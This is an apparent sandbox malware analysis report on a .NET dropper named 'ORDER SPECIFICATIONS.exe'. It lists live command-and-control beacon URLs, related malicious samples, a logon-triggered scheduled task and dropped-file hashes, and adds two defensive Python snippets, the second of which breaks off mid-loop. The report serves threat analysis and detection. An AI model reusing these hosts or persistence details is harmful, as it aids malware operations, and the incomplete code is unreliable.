                                                                                      Simulations

                                                                                      Behavior and APIs

Time | Type | Description
08:56:54 | API Interceptor | 1x Sleep call for process: ORDER SPECIFICATIONS.exe modified

                                                                                      Joe Sandbox View / Context

                                                                                      IPs

Match | Associated Sample Name / URL (Detection) | Context

Match: 54.85.86.211
• JwekqCZAwt.exe (malicious): www.anaejoao2021.com/d8h/?YvFH=wR-xA2rHgBVhIve&KXRxqv=+QMxmTeTC6jkfr4PP0NsNs+LKlSXE0MxkE7EsU8NRX32ujCu2Mn1Ekqy+ne7AOeWmMaD
• request.exe (malicious): www.anaejoao2021.com/d8h/?1bS=+QMxmTeTC6jkfr4PP0NsNs+LKlSXE0MxkE7EsU8NRX32ujCu2Mn1Ekqy+neRf+uWiOSD&DXaDp=fRmTtjUX8ZQHeF6
• PO#646756575646.exe (malicious): www.anaejoao2021.com/d8h/?EhLT5l=9rhdJxHx-Bl&YL0=+QMxmTeTC6jkfr4PP0NsNs+LKlSXE0MxkE7EsU8NRX32ujCu2Mn1Ekqy+k+rPvOu4pzE
• PO8479349743085.exe (malicious): www.anaejoao2021.com/d8h/?-Z1hir=+QMxmTeTC6jkfr4PP0NsNs+LKlSXE0MxkE7EsU8NRX32ujCu2Mn1Ekqy+kySDOiuvvvVPuj7Qw==&2dz=onrhc

Match: 34.102.136.180
• NewOrder.xlsm (malicious): www.covidwatcharizona.com/tub0/?azuxWju=dEK3j7mWBeQXl2zlSZSqDcFEW4EdlZEYoS0+mEVRU2HuA7A7T/ky1yECx94kGVXSwos3qg==&0dt=YtdhwPcHS
• Order_20180218001.exe (malicious): www.houstoncouplesexpert.com/seon/?EJBpf8l=ojsb3jKq/XKh64QU9jx/ITCiT4+67gOjnvEpe+kxWJrzMHvdGcv1c3rSoEz5gk4FhTBQ&kDKHiZ=QFNTw2k
• 22 FEB -PROCESSING.xlsx (malicious): www.rizrvd.com/bw82/?RFQx_=AJ+QNFfsTFGsedRB1oQHABBFVni950JEMBOKAlzmtW9JOrHkbqbPAoxgnlDKI2ECKqRl+w==&GZopM=kvuD_XrpiP
• ORDER LIST.xlsx (malicious): www.speedysnacksbox.com/4qdc/?jpaha=oetlJbtkpt9RC07gzGtc819EDOSw/wKhNDKeGQ7agYbSWM8ZAAA074MmVo5ceZhU2bos5Q==&3fz=fxopBn3xezt4N4a0
• PO_210222.exe (malicious): www.kspindustries.com/dka/?9rYD4D2P=9WUKE20VMOTsgTPOGG+gM7wMKgTDQQYKjBu36Jx5uNlLi85Jvnz4VQqFTS3DYsDMhKcM&4h=vTxdADNprBU8ur
• Order83930.exe (malicious): www.worksmade.com/pkfa/?kRm0q=AeLHm4krJ5cZleWXJ7DbkRDB3iMf+mbqkQIEvPdjRXBov8eOMTfw1ykaYqt0P2yYW1wd&P0D=AdpLplk
• DHL eInvoice_Pdf.exe (malicious): www.lovethybodi.com/dll/?Ezrt7H=XrITfbQx&rJET96=VZxax5Ji0ayI+hrvRc8xbN6ADZocsLe3YiHwLknRP/O6fJJXAg3ZXgaLGnTQhcDUXCIi
• AWB-INVOICE_PDF.exe (malicious): www.sioosi.com/idir/?jFNhC=BAdMNhCaU+7u9XJaCO3iV4C5aA0TCLj07dpBj0L8TrCXQaq7x7/wZRF1tJRJ0mfI3EQomiZFcg==&PlHT0=_6g89p5H3xehg
• rad875FE.tmp.exe (malicious): fdmail85.club/serverstat315/
• SecuriteInfo.com.Trojan.Inject4.6572.17143.exe (malicious): www.buyers-connection.com/mt6e/?T8e0dp=hLmMffsGgwjrW5RZdYCH6mddSm2W9hJJfHEwGoyKmHJo5/xZlUyZeqeg++L426DpjyYm&Fx=3fdx_dt
• DHL Document. PDF.exe (malicious): www.thebrowbandit.info/d8ak/?Szr0s4=zH7+TMUEa66ds4LUG5QkV+A8HFZNfwJlYCtch+3uZ/cbqgmlMO3qxYa4o/rgt+cFNwefcp2wvw==&QL3=uTyTqJdh5XE07
• eInvoice.exe (malicious): www.cyberxchange.net/dll/?alI=J6AlYtFHR6r&DxlLi=O16Cpvehw381JgOcsiBVvt6SNBXVOB+15MfeRQ6rIhocO090ZFQOuEsCZWtNgYTmelCy
• IMG_7742_Scanned.doc (malicious): www.beasley.digital/gypo/?UrjPuprX=M7Hk14MLzXe1S9acHT7ZsieFPBYG9bGpGcbZ4ICPUuDVYKBFzTViR4JE6d+ne5phLrjWAg==&nnLx=UBZp3XKPefjxdB
• Outstanding Invoices.pdf.exe (malicious): www.arescsg.com/ocq1/?Bl=lHLLrF4h72F&ITrHi2v=QNjT++wY9a5zCVAjoE7Ie93o6MHPk5lGE/qlj9tP3aNbcRLbl33t+j0E2POpmVTB9EfC
• PDF.exe (malicious): www.sevendeepsleep.com/ujg4/?Ktz4q=vVYHGFhESmr0MhafV2r1epXRiWHZKHpqHzgNJrSdHWrYUNDGZWFgSG6u51EUVnN8n2QK&tTrL=ApdhXrS
• quotation10204168.dox.xlsx (malicious): www.scanourworld.com/nsag/?ixlp=RjpY/w7V4Gns1L0rMkaS4a7cxyPO11vhmKSgl8HqKcRxVLLhONg71u8j186CVYVfR9NOyw==&3f=7nD434
• (G0170-PF3F-20-0260)2T.exe (malicious): www.midnightblueinc.com/2kf/?-ZotnB1=PuGWiF25ErpS8LxGcVT732T32YJ8ljB4Nen33bTYqCA1w1k4pKKXZiLEs+9S++zZpoCcFtK2bw==&2d=oneDfP
• RdLlHaxEKP.exe (malicious): www.royalpetcanvas.com/dyt/?T6AH=NhjxntVXuOKv8VzGSZxWT+wjSfPb58K86TJrQp8bJ11pPHhqBmicI70lfwP4sRyRZd3a&wPT=lf5X
• 7R29qUuJef.exe (malicious): www.gdsjgf.com/bw82/?RX=dn9dSBwpLLodPRy&YliL=7KG5rMnJQVi61jAewyvwq06b8xrmRTVdiDIOhf904IMqwa5VOrK6tjTZXZLtdUJUmSqf
• Drawings2.exe (malicious): www.threebearstoronto.com/e68n/?t8l=FrFLaXJ&OXXTJ=rmAZCyc7Ns5evfiyA1QxM7ECDhDtKxCV7gbVr6Kinm6bQxm9MNnkIGnVyVwusC/d0JpN
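Nearly every context URL above has the same shape: a short lower-case path segment, then a query of exactly two parameters, one of which is a long base64-looking blob. The four beacons to www.anaejoao2021.com even share most of that blob. The script below is an added example, not code from Joe Sandbox or from this report, that turns that observation into a triage heuristic: it flags URLs with that shape and exposes the common blob prefix so an analyst can pivot on it. The path and blob regexes are assumptions drawn from the listed entries, the sample input reuses five URLs copied from the table plus one constructed benign URL, and a hit is a hunting lead rather than proof of infection.

```python
"""Heuristic triage for beacon-shaped URLs like those in the context table.

Added example, not part of the Joe Sandbox report. PATH_RE and BLOB_RE are
assumptions derived from the listed URLs (/d8h/, /bw82/, /gypo/ ... followed
by two query parameters, one carrying a 40+ character base64-style value).
"""
import os
import re
from urllib.parse import urlsplit

# one short alphanumeric path segment with a trailing slash (assumed shape)
PATH_RE = re.compile(r"^/[a-z0-9]{2,6}/$")
# raw base64 alphabet as it appears unencoded in the query ('+', '/', '='),
# plus '-' and '_' which the listed blobs also contain; 40+ chars (assumed)
BLOB_RE = re.compile(r"^[A-Za-z0-9+/_\-]{40,}={0,2}$")


def split_query(query):
    """Split a raw query string without decoding '+' or '=' inside values."""
    pairs = []
    for item in query.split("&"):
        if item:
            key, _, value = item.partition("=")
            pairs.append((key, value))
    return pairs


def beacon_blob(url):
    """Return the base64-looking parameter value of a beacon-shaped URL, else None."""
    if "://" not in url:
        url = "http://" + url  # the report lists host/path without a scheme
    parts = urlsplit(url)
    if not PATH_RE.match(parts.path):
        return None
    pairs = split_query(parts.query)
    if len(pairs) != 2:
        return None
    blobs = [value for _, value in pairs if BLOB_RE.match(value)]
    return max(blobs, key=len) if blobs else None


def looks_like_formbook_beacon(url):
    """True when the URL matches the assumed beacon shape."""
    return beacon_blob(url) is not None


def shared_prefix(urls):
    """Longest common prefix of the blobs of all beacon-shaped URLs ('' if none)."""
    blobs = [blob for blob in (beacon_blob(u) for u in urls) if blob]
    return os.path.commonprefix(blobs) if blobs else ""


def triage(urls):
    """Return the beacon-shaped URLs, in input order."""
    return [u for u in urls if looks_like_formbook_beacon(u)]


# Sample input: five entries copied from the context table above plus one
# constructed benign URL (the last one) that shares the short-path shape
SAMPLE_URLS = [
    "www.anaejoao2021.com/d8h/?YvFH=wR-xA2rHgBVhIve&KXRxqv=+QMxmTeTC6jkfr4PP0NsNs+LKlSXE0MxkE7EsU8NRX32ujCu2Mn1Ekqy+ne7AOeWmMaD",
    "www.anaejoao2021.com/d8h/?1bS=+QMxmTeTC6jkfr4PP0NsNs+LKlSXE0MxkE7EsU8NRX32ujCu2Mn1Ekqy+neRf+uWiOSD&DXaDp=fRmTtjUX8ZQHeF6",
    "www.anaejoao2021.com/d8h/?EhLT5l=9rhdJxHx-Bl&YL0=+QMxmTeTC6jkfr4PP0NsNs+LKlSXE0MxkE7EsU8NRX32ujCu2Mn1Ekqy+k+rPvOu4pzE",
    "www.anaejoao2021.com/d8h/?-Z1hir=+QMxmTeTC6jkfr4PP0NsNs+LKlSXE0MxkE7EsU8NRX32ujCu2Mn1Ekqy+kySDOiuvvvVPuj7Qw==&2dz=onrhc",
    "fdmail85.club/serverstat315/",
    "http://example.com/ab1/?q=search&page=2",  # constructed, not from the report
]

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        print("BEACON" if looks_like_formbook_beacon(url) else "      ", url)
    print("shared blob prefix:", shared_prefix(SAMPLE_URLS))
```

The query is split by hand rather than with parse_qsl because form decoding would turn the '+' characters inside the blob into spaces and break the alphabet check. Run against the sample list, the four www.anaejoao2021.com entries are flagged, the fdmail85.club and example.com entries are not, and the shared prefix is the 57 characters the four blobs have in common.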

                                                                                      Domains

Match | Associated Sample Name / URL (Detection) | Context

Match: 104.233.225.185.cname-url.com
• http://txfc58.com/wordpress/m2utbn-3ft4c-07947/ (malicious): 23.225.123.149

Match: shops.myshopify.com
• ORDER LIST.xlsx (malicious): 23.227.38.74
• PO_210222.exe (malicious): 23.227.38.74
• SecuriteInfo.com.Trojan.Inject4.6572.10651.exe (malicious): 23.227.38.74
• SecuriteInfo.com.Trojan.Inject4.6572.17143.exe (malicious): 23.227.38.74
• IMG_7742_Scanned.doc (malicious): 23.227.38.74
• PDF.exe (malicious): 23.227.38.74
• D6ui5xr64I.exe (malicious): 23.227.38.74
• Drawings.xlsm (malicious): 23.227.38.74
• Purchase order.exe (malicious): 23.227.38.74
• AgroAG008021921doc_pdf.exe (malicious): 23.227.38.74
• IMG_7189012.exe (malicious): 23.227.38.74
• DHL Shipment Notification 7465649870,pdf.exe (malicious): 23.227.38.74
• HEC Batangas Integrated LNG and Power Project DocumentationsType a message.exe.exe (malicious): 23.227.38.74
• DHL Shipment Notification 7465649870.pdf.exe (malicious): 23.227.38.74
• q9xB9DE3RA.exe (malicious): 23.227.38.74
• 51BfqRtUI9.exe (malicious): 23.227.38.74
• PO copy.pdf.exe (malicious): 23.227.38.74
• RFQ 2-16-2021-.exe (malicious): 23.227.38.74
• NEW ORDER - VOLVO HK HKPO2102-13561,pdf.exe (malicious): 23.227.38.74
• WAFPASSION + PDA_NOTICE.xlsx (malicious): 23.227.38.74

                                                                                      ASN

Match | Associated Sample Name / URL (Detection) | Context

Match: TENCENT-NET-AP-CN Tencent Building Kejizhongyi Avenue, CN
• po.exe (malicious): 129.226.58.179
• infected.apk (malicious): 129.226.107.80
• infected.apk (malicious): 129.226.107.80
• #U56fd#U5bb6#U961f.vmp.exe (malicious): 203.205.235.81
• KROS Sp. z.o.o.exe (malicious): 119.28.5.87
• KROS Sp. z.o.o.exe (malicious): 119.28.5.87
• po.exe (malicious): 129.226.58.179
• M1t8Jk185a.exe (malicious): 119.28.6.251
• Mensaje-22-012021.doc (malicious): 124.156.135.253
• certificado.doc (malicious): 101.32.209.55
• file.doc (malicious): 124.156.135.253
• IFS_1.0.69.apk (malicious): 129.226.103.217
• IFS_1.0.69.apk (malicious): 129.226.103.12
• adware_beauty.apk (malicious): 129.226.103.217
• flashplayerpp_install_cn (1).exe (malicious): 211.152.136.89
• Mv Maersk Kleven V949E_pdf.exe (malicious): 119.28.17.183
• Doc.doc (malicious): 124.156.117.232
• JI35907_2020.doc (malicious): 124.156.117.232
• DATI 2020.doc (malicious): 124.156.117.232
• TZ8322852306TL.doc (malicious): 129.226.14.227

Match: GOOGLE, US
• crypted.exe (malicious): 216.239.32.21
                                                                                      NewOrder.xlsmGet hashmaliciousBrowse
                                                                                      • 34.102.136.180
                                                                                      Order_20180218001.exeGet hashmaliciousBrowse
                                                                                      • 34.102.136.180
                                                                                      22 FEB -PROCESSING.xlsxGet hashmaliciousBrowse
                                                                                      • 34.102.136.180
                                                                                      SOA.exeGet hashmaliciousBrowse
                                                                                      • 35.186.238.101
                                                                                      ORDER LIST.xlsxGet hashmaliciousBrowse
                                                                                      • 34.102.136.180
                                                                                      File Downloader [14.5].apkGet hashmaliciousBrowse
                                                                                      • 142.250.186.74
                                                                                      PO_210222.exeGet hashmaliciousBrowse
                                                                                      • 34.102.136.180
                                                                                      Order83930.exeGet hashmaliciousBrowse
                                                                                      • 34.102.136.180
                                                                                      unmapped_executable_of_polyglot_duke.dllGet hashmaliciousBrowse
                                                                                      • 216.239.32.21
                                                                                      GUEROLA INDUSTRIES N#U00ba de cuenta.exeGet hashmaliciousBrowse
                                                                                      • 142.250.186.33
                                                                                      DHL eInvoice_Pdf.exeGet hashmaliciousBrowse
                                                                                      • 34.102.136.180
                                                                                      AWB-INVOICE_PDF.exeGet hashmaliciousBrowse
                                                                                      • 34.102.136.180
                                                                                      xerox for hycite.htmGet hashmaliciousBrowse
                                                                                      • 142.250.186.33
                                                                                      rad875FE.tmp.exeGet hashmaliciousBrowse
                                                                                      • 34.102.136.180
                                                                                      SecuriteInfo.com.Trojan.Inject4.6572.17143.exeGet hashmaliciousBrowse
                                                                                      • 34.102.136.180
                                                                                      IMG_61061_SCANNED.docGet hashmaliciousBrowse
                                                                                      • 35.200.172.247
                                                                                      X1(1).xlsmGet hashmaliciousBrowse
                                                                                      • 142.250.186.66
                                                                                      IMG_6078_SCANNED.docGet hashmaliciousBrowse
                                                                                      • 35.200.172.247
                                                                                      fedex.apkGet hashmaliciousBrowse
                                                                                      • 142.250.186.138
                                                                                      UNIFIEDLAYER-AS-1USPO-A2174679-06.exeGet hashmaliciousBrowse
                                                                                      • 192.185.78.145
                                                                                      22 FEB -PROCESSING.xlsxGet hashmaliciousBrowse
                                                                                      • 108.167.156.42
                                                                                      CV-JOB REQUEST______PDF.EXEGet hashmaliciousBrowse
                                                                                      • 192.185.181.49
                                                                                      PO.exeGet hashmaliciousBrowse
                                                                                      • 192.185.0.218
                                                                                      Complaint-1091191320-02182021.xlsGet hashmaliciousBrowse
                                                                                      • 192.185.16.95
                                                                                      ESCANEAR_FACTURA-20794564552_docx.exeGet hashmaliciousBrowse
                                                                                      • 162.214.158.75
                                                                                      AWB-INVOICE_PDF.exeGet hashmaliciousBrowse
                                                                                      • 192.185.46.55
                                                                                      iAxkn PDF.exeGet hashmaliciousBrowse
                                                                                      • 192.185.100.181
                                                                                      carta de pago pdf.exeGet hashmaliciousBrowse
                                                                                      • 192.185.5.166
                                                                                      PO.exeGet hashmaliciousBrowse
                                                                                      • 108.179.232.42
                                                                                      payment details.pdf.exeGet hashmaliciousBrowse
                                                                                      • 50.87.95.32
                                                                                      new order.exeGet hashmaliciousBrowse
                                                                                      • 108.179.232.42
                                                                                      CV-JOB REQUEST______pdf.exeGet hashmaliciousBrowse
                                                                                      • 192.185.181.49
                                                                                      RdLlHaxEKP.exeGet hashmaliciousBrowse
                                                                                      • 162.214.184.71
                                                                                      Drawings2.exeGet hashmaliciousBrowse
                                                                                      • 198.57.247.220
                                                                                      EFT Remittance.xlsGet hashmaliciousBrowse
                                                                                      • 162.241.120.180
                                                                                      Remittance Advice.xlsGet hashmaliciousBrowse
                                                                                      • 162.241.120.180
                                                                                      Complaint_Letter_1212735678-02192021.xlsGet hashmaliciousBrowse
                                                                                      • 192.185.17.119
                                                                                      Complaint_Letter_1212735678-02192021.xlsGet hashmaliciousBrowse
                                                                                      • 192.185.17.119
                                                                                      SecuriteInfo.com.BehavesLike.Win32.Generic.ch.exeGet hashmaliciousBrowse
                                                                                      • 162.241.194.14

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ORDER SPECIFICATIONS.exe.log
Process: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
File Type: ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 1314
Entropy (8bit): 5.350128552078965
Encrypted: false
SSDEEP: 24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
MD5: 1DC1A2DCC9EFAA84EABF4F6D6066565B
SHA1: B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
SHA-256: 28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
SHA-512: 95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
Malicious: true
Reputation: high, very likely benign file
                                                                                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
C:\Users\user\AppData\Local\Temp\tmpDA15.tmp
Process: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1644
Entropy (8bit): 5.1713595838000685
Encrypted: false
SSDEEP: 24:2dH4+SEqC/a7hTlNMFpH/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBbtn:cbhC7ZlNQF/rydbz9I3YODOLNdq3D
MD5: 655B601E240FE8E0C83DABE6037B8A13
SHA1: A80DA09FA0A2141145E2BB0A55CD0BE796BCC7A1
SHA-256: 8410B13023E7E02C7A196F7104F913C19E8D99E2FE7220CD85AA496D15C0BE85
SHA-512: 3C4DAE9D022AEFC9354E595A020CBD0E5D938493A2BAA3B7A871B515674F68EA0A6BB634692F2926FD132EC8AB22BB3B867F11F9231EFFD5ED6C0E45CFB22F81
Malicious: true
Reputation: low
                                                                                      Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>t
C:\Users\user\AppData\Roaming\LvZiFDk.exe
Process: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 552448
Entropy (8bit): 7.441638759834839
Encrypted: false
SSDEEP: 12288:EkPa0YM/0rvX7/ozV2peyq6nnQHyCfGofwabvIZy:Dascr2wQv0oB4ab0y
MD5: E75A4DF51162401B21C3EB79718FB3DB
SHA1: 3328EAD22DB03CE461CB8BDB5D59638120E2444F
SHA-256: 48709C3E07C128283D9D550331D6E5F7C4AFEADFC61CAD94D769EA8CE7399E77
SHA-512: 316D9088ACABC1BC7FA003BF0E5D8F03E96F8242441B264984E317126DBFA2745DB557338D34D96CEFB18228D00E1B28126D066FD06A810F7B8F485932D23307
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 15%
Reputation: low
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...kM4`..............P..P...........o... ........@.. ....................................@..................................o..O.................................................................................... ............... ..H............text....O... ...P.................. ..`.rsrc................R..............@..@.reloc...............l..............@..B.................o......H........x...S..........................................................0............(....(..........(.....o ....*.....................(!......("......(#......($......(%....*N..(....o....(&....*&..('....*.s(........s)........s*........s+........s,........*....0...........~....o-....+..*.0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*.0...........~....o1....+..*.0..<........~.....(2.....,!r...p.....(3...o4...s5............~.....+..*.0......
C:\Users\user\AppData\Roaming\LvZiFDk.exe:Zone.Identifier
Process: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: true
Reputation: high, very likely benign file
Preview: [ZoneTransfer]....ZoneId=0

Static File Info

General

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.441638759834839
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: ORDER SPECIFICATIONS.exe
File size: 552448
MD5: e75a4df51162401b21c3eb79718fb3db
SHA1: 3328ead22db03ce461cb8bdb5d59638120e2444f
SHA256: 48709c3e07c128283d9d550331d6e5f7c4afeadfc61cad94d769ea8ce7399e77
SHA512: 316d9088acabc1bc7fa003bf0e5d8f03e96f8242441b264984e317126dbfa2745db557338d34d96cefb18228d00e1b28126d066fd06a810f7b8f485932d23307
SSDEEP: 12288:EkPa0YM/0rvX7/ozV2peyq6nnQHyCfGofwabvIZy:Dascr2wQv0oB4ab0y
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...kM4`..............P..P...........o... ........@.. ....................................@................................

File Icon

Icon Hash: 0563734bfff3e3a1

Static PE Info

General

Entrypoint: 0x476fee
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x60344D6B [Tue Feb 23 00:33:47 2021 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x76f9c          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x78000          0x118a0       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x8a000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
.text   0x2000           0x74ff4       0x75000   False     0.752839960604   data       7.43400315564   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc   0x78000          0x118a0       0x11a00   False     0.445187832447   data       5.81195077759   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x8a000          0xc           0x200     False     0.044921875      data       0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
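The Entropy column is the Shannon entropy of each section's raw bytes in bits per byte. A value of 7.43 for the only executable section of an assembly that imports nothing but mscoree.dll!_CorExeMain points to compressed or encrypted data stored in .text rather than plain compiled code, which is what the "potential unpacker" and "very large strings" signatures in this report are keyed on. The following is an added example, not code from the report or from Joe Sandbox: it parses the PE section table by hand, computes the same entropy figure, and flags executable sections above an assumed triage threshold of 7.0. The one-section PE image it builds for itself is constructed test data, not the sample.

```python
import math
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string in bits per byte (0.0 for constant data, 8.0 for uniform)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes) -> list:
    """Walk MZ -> PE -> COFF -> section table; return one dict per section with the entropy of its raw data."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    (num_sections,) = struct.unpack_from("<H", pe, coff + 2)
    (opt_size,) = struct.unpack_from("<H", pe, coff + 16)   # SizeOfOptionalHeader
    table = coff + 20 + opt_size                            # section table follows the optional header
    sections = []
    for i in range(num_sections):
        off = table + 40 * i                                # IMAGE_SECTION_HEADER is 40 bytes
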